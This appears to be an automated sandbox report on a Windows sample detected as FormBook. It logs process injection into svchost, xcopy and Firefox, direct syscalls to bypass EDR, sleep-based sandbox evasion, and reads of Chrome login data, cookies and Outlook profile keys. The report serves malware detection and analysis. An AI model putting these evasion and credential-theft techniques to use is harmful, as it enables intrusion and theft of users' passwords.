            Source: C:\Windows\SysWOW64\xcopy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RN# D7521-RN-00353 REV-2.exeStatic file information: File size 1214976 > 1048576
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CuJYYyjxRgkNEt.exe, 00000003.00000000.380200638.0000000000E8E000.00000002.00000001.01000000.00000004.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000000.408916636.0000000000E8E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdb source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.350686083.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.351128311.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.396344493.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.378610420.0000000000630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.378319985.0000000000260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.396344493.0000000000940000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000004.00000003.396292573.0000000001D90000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000004.00000002.617084024.0000000002080000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000004.00000003.396624750.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000004.00000002.617084024.0000000002200000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdbN source: svchost.exe, 00000002.00000002.396325219.0000000000544000.00000004.00000020.00020000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000002.616864409.0000000000844000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdb source: svchost.exe, 00000002.00000002.396325219.0000000000544000.00000004.00000020.00020000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000002.616864409.0000000000844000.00000004.00000020.00020000.00000000.sdmp
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: sqlite3.dll.4.drStatic PE information: section name: /4
            Source: sqlite3.dll.4.drStatic PE information: section name: /19
            Source: sqlite3.dll.4.drStatic PE information: section name: /31
            Source: sqlite3.dll.4.drStatic PE information: section name: /45
            Source: sqlite3.dll.4.drStatic PE information: section name: /57
            Source: sqlite3.dll.4.drStatic PE information: section name: /70
            Source: sqlite3.dll.4.drStatic PE information: section name: /81
            Source: sqlite3.dll.4.drStatic PE information: section name: /92
            Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeAPI/Special instruction interceptor: Address: 1103C9C
            Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 458Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9500Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 3432Thread sleep count: 458 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 3432Thread sleep time: -916000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 3484Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 3432Thread sleep count: 9500 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 3432Thread sleep time: -19000000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xcopy.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: CuJYYyjxRgkNEt.exe, 00000003.00000002.616962085.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000000.380211250.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000000.408932957.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: CuJYYyjxRgkNEt.exe, 00000003.00000002.616962085.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000000.380211250.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000000.408932957.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CuJYYyjxRgkNEt.exe, 00000003.00000002.616962085.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000000.380211250.0000000000EB0000.00000002.00000001.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000000.408932957.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: RN# D7521-RN-00353 REV-2.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\grw0i.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616853860.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.452537297.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.616973792.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396448093.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
